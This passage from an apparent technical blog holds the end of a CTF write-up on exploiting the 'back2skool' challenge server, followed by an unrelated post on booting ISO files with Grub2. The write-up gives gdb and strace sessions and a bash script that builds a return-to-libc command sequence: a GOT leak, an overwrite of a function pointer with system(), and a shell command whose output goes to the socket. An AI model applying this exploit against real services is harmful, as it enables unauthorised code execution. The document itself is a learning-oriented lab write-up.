    $ objdump -dS ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f  | grep -A2 recv@plt
    08048980 <recv@plt>:
     8048980:	ff 25 c0 bf 04 08    	jmp    *0x804bfc0

0x804bfc0 is the GOT entry for recv function.

  • finding the relative offset of the function we want to jump to (e.g. system) is harder, because this offset depends on the libc version used on the target system. To keep things simple, we will first focus on exploiting locally, where we have access to our libc file. To compute the offset, we only have to look up both functions in libc’s symbol table.

    $ readelf -s /lib/tls/i686/cmov/libc.so.6 | grep ' recv@'
      1124: 000cebf0   118 FUNC    WEAK   DEFAULT   12 recv@@GLIBC_2.0
    $ readelf -s /lib/tls/i686/cmov/libc.so.6 | grep ' system@'
      1398: 00039100   125 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0
    $ echo $((0x00039100-0x000cebf0))
    -613104

The offset is -613104. Note that it depends on the libc version, so the exploit isn’t very reliable. Let’s focus on exploiting locally for now and postpone computing the remote offset. We will write at the same address as in the first PoC, but this time the value is the address of the system function, i.e. address_of_recv_function+OFFSET.

$ telnet localhost 31337
read
Input position to read from:
-32
Value at position -32: -1217696784
write
Input position to write to:
-2147483634
Input numeric value to write:
-1218309888
Value at position -2147483634: -1218309888
math
Result of math: -1

Reading index -32 is equivalent to reading 32*4 bytes before our buffer: 0x804c040-32*4 is 0x804bfc0, the GOT entry of recv. The value we write, -1218309888, is -1217696784-613104.
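Likewise, the numbers from this session can be recomputed in bash. The libc_base line is an extra sanity check of ours, not part of the original exploit. Subtracting recv’s symbol value from its leaked address should yield a page-aligned libc load address.

```shell
#!/bin/bash
# Reproduce the numbers of the second PoC (local libc only).
values=$(( 0x804c040 ))       # &values[0]
recv_got=$(( 0x804bfc0 ))     # GOT slot for recv, from objdump above
got_index=$(( (recv_got - values) / 4 ))   # -32: the "read" index

leaked_recv=-1217696784       # what "read -32" returned in the session above
offset=$(( 0x00039100 - 0x000cebf0 ))      # system - recv in the local libc
system_addr=$(( leaked_recv + offset ))    # value written into the math pointer

# Sanity check: recv's address minus its symbol value gives the libc base,
# which should be page aligned (low 12 bits zero).
libc_base=$(( (leaked_recv & 0xffffffff) - 0xcebf0 ))

printf 'got_index=%d offset=%d system=%d libc_base=0x%x\n' \
    "$got_index" "$offset" "$system_addr" "$libc_base"
```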

Hey, it didn’t crash, that’s a plus! Meanwhile, back at the castle.

$ strace -f ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
[...]
[pid  4901] send(4, "Value at position -2147483634: -"..., 43, 0) = 43
[pid  4901] read(4, "m", 1)             = 1
[pid  4901] read(4, "a", 1)             = 1
[pid  4901] read(4, "t", 1)             = 1
[pid  4901] read(4, "h", 1)             = 1
[pid  4901] read(4, "\r", 1)            = 1
[pid  4901] read(4, "\n", 1)            = 1
[...]
[pid  4902] execve("/bin/sh", ["sh", "-c", ""], [/* 31 vars */]) = 0
[pid  4902] brk(0)                      = 0x9a04000
[...]

We successfully called execve!

Parameters to execve

We are able to run execve, but we don’t control its parameters … yet. Let’s see which parameters execve is called with.

$ gdb ./back2skool-3fbcd46db37c50ad52675294f566790c777b9d1f
[...]
Reading symbols from /root/back2skool-3fbcd46db37c50ad52675294f5667909d1f...(no debugging symbols found)...done.
(gdb) set follow-fork-mode child 
(gdb) catch syscall execve 
Catchpoint 1 (syscall 'execve' [11])
(gdb) r
[...]
Catchpoint 1 (call to syscall 'execve'), 0xb7fe2424 in __kernel_vsyscall ()
(gdb) info registers 
eax            0xffffffda	-38
ecx            0xbffff3b4	-1073744972
edx            0xbffff5ac	-1073744468
ebx            0xb7fa5a5a	-1208329638
[...]
(gdb) x/s $ebx
0xb7fa5a5a:	 "/bin/sh"
(gdb) x/5x $ecx
0xbffff3b4:	0xb7fa5a5f	0xb7fa5a57	0x0804c040	0x00000000
0xbffff3c4:	0xb7ead180
(gdb) x/s ((char **)$ecx)[0]
0xb7fa5a5f:	 "sh"
(gdb) x/s ((char **)$ecx)[1]
0xb7fa5a57:	 "-c"
(gdb) x/s ((char **)$ecx)[2]
0x804c040 <values>:	 ""
(gdb) 

Because we’re using the system function, the first arguments are set accordingly (sh -c), but the actual command (((char **)$ecx)[2]) is empty. You can have a look at the execve syscall parameters and its calling convention. Here we’re very lucky: the command passed to system is our values buffer, the initial workspace table. Its first element is 0, hence the empty string. Let’s recap our approach:

  • get the address of recv function via GOT
  • set the pointer of math function to system by adding an offset to recv function address
  • set the parameters in the workspace table
  • trigger the exploit by using the math function
  • profit

Getting some output

The only remaining problem was that the communication socket is file descriptor 4, while the command’s output goes to file descriptor 1. Appending >&4 2>&4 to the command did the trick for us.
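Put together, the whole approach boils down to a short list of lines sent over the connection. The sketch below generates them; it is not the final exploit linked at the end of this post. It rests on these assumptions:

  • the local offset -613104 computed above;
  • a plain ASCII command of at most 39 characters (ten 4-byte table slots, including the terminating NUL);
  • a little-endian host, because od(1) decodes words in host byte order;
  • hypothetical function names string_to_words and exploit_script.

The leaked recv address would come from a read -32 issued first.

```shell
#!/bin/bash
# Sketch of the MathServ command sequence, assuming the local offsets computed
# above and a little-endian (x86) host. Function names are hypothetical.

OFFSET=-613104               # system - recv in the local libc
MATH_PTR_INDEX=-2147483634   # wraps around to the math function pointer

# Print a NUL-terminated ASCII string as 32-bit signed integers (host order).
string_to_words() {
    local cmd=$1
    # Round up to a multiple of 4 bytes, always keeping at least one NUL.
    local padded=$(( (${#cmd} / 4 + 1) * 4 ))
    { printf '%s' "$cmd"; printf '\0\0\0\0'; } | head -c "$padded" | od -An -v -t d4
}

# Print the lines to send: the command into values[0..9], system() into the
# math pointer, then "math" to trigger the call.
exploit_script() {
    local leaked_recv=$1 cmd=$2 i=0 word
    if [ "${#cmd}" -gt 39 ]; then
        echo "command does not fit in the 10-slot table (39 characters max)" >&2
        return 1
    fi
    for word in $(string_to_words "$cmd"); do
        printf 'write\n%d\n%d\n' "$i" "$word"
        i=$(( i + 1 ))
    done
    printf 'write\n%d\n%d\n' "$MATH_PTR_INDEX" $(( leaked_recv + OFFSET ))
    printf 'math\n'
}

# Example with the recv address leaked earlier by "read -32".
exploit_script -1217696784 'id >&4 2>&4'
```

The printed lines are meant to be sent after the read -32 step, once the leaked value is known.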

The offset, the Achilles’ Heel of the exploit

Well, the exploit worked locally, but not remotely.

Recall that when computing the offset of the system function relative to the recv function, we only had access to our local libc, not to the one used on the target system. A few ideas came up:

  • try different offsets by gathering as many libcs as possible from well-known distros. After an hour of trying all the libc binaries from Ubuntu, I started to wonder whether I was on the right track.
  • try random values - this didn’t work at all and it was time consuming (I was already tired and not thinking clearly).
  • get a copy of the libc in use - this is a problem because we cannot call open; at best, we might call send on the socket with the libc mapping as the buffer.
  • hope for the best: use another challenge (which we had already exploited) to download its libc file and hope that this system has the same one.
  • do a smarter search by matching function prologues (push %ebp, mov %esp, %ebp etc.); this would require too much work.
  • use some magical tool/table that I’m not sure exists.

We used a previous level to download its libc. It turned out to be identical to the one used by the current challenge, so we were able to compute the offset for the remote system.

I don’t know of any method of doing a reliable return-to-libc attack without knowing the addresses of some functions. Maybe there’s a way to recover all the symbols once the libc base is known; that would be neat.

The final exploit can be found here.

Conclusion

We’ve presented a way of doing a return-to-libc attack. Even though it is a primitive approach, it does reuse a function from libc. We also had to compute the offset of that function from the address of another function, which makes the exploit unreliable.

In the end, it boils down to having the right skills to use the right tools; it’s nothing fancy.

Grub2 and ISO boot

Published on 25 October 2012 by Alexandru Juncu

Grub2 is the next-generation Linux bootloader that is trying to replace the “Legacy” Grub version. It is a complete rewrite of Grub 1 that has only lately become fully featured compared to the old version, and it even comes with some interesting new features.

The old Grub’s configuration was rather straightforward, everything being done in a configuration file in the grub directory of the /boot partition (it’s a common practice to have /boot mounted on a separate filesystem). In Debian it was usually /boot/grub/menu.lst and in Red Hat /boot/grub/grub.conf (sometimes one being a symlink to the other).

The configuration file for Grub2 is /boot/grub/grub.cfg, but the file itself should never be edited by hand (the generated file is read-only). Instead, it is generated by commands like update-grub2, based on other configuration files such as (in Debian) /etc/default/grub. That file holds global settings such as the menu timeout and the default entry.

The menu entries for the operating systems themselves are generated based on files in the /etc/grub.d/ directory (in Debian). An interesting feature of Grub2 is the fact that these files are actually Bash scripts. OS entries don’t need to be hard coded, but can be scripted. One such script is the 10_linux file that detects any new kernel image in the /boot directory and writes a new entry for it without having to manually add it. Manual entries can also be written in these files (usually in the 40_custom script file).

An interesting new feature in Grub2 is the ability to boot from an ISO file. A LiveCD can be stored as an ISO file on disk and loaded by Grub without having to burn it onto a CD or boot the normal system first. A menu entry for ISO booting looks like this:

menuentry "Ubuntu LiveCD" {
        loopback loop (hd0,1)/boot/iso/ubuntu-12.04-desktop-i386.iso
        linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=/boot/iso/ubuntu-12.04-desktop-i386.iso noprompt noeject
        initrd (loop)/casper/initrd.lz
}

Based on the previous ideas, here’s a way to configure Grub to create an entry for every .iso file in a given directory. First, create a directory to store the .iso files (e.g. /boot/iso/) and move your Live CDs there.

Next, make a script in the /etc/grub.d/ directory. Let’s call it 42_iso (the number in front dictates the order in which the scripts are executed).

#!/bin/bash

ISO_DIR="/boot/iso/"

# Iterate with a glob instead of parsing the output of ls.
for iso in "$ISO_DIR"*.iso; do
	# With no .iso files the pattern stays unexpanded; skip it.
	[ -e "$iso" ] || continue
	echo "menuentry \"$iso\" {"
	echo "set isofile=\"$iso\""
	echo "loopback loop (hd0,1)\$isofile"
	echo "linux (loop)/casper/vmlinuz boot=casper iso-scan/filename=\$isofile noprompt noeject"
	echo "initrd (loop)/casper/initrd.lz"
	echo "}"
done

Don’t forget to make it executable. Then run the update-grub2 command to regenerate the Grub2 configuration file.

chmod +x /etc/grub.d/42_iso
update-grub2

Thanks to doraz for suggesting ISO booting with Grub.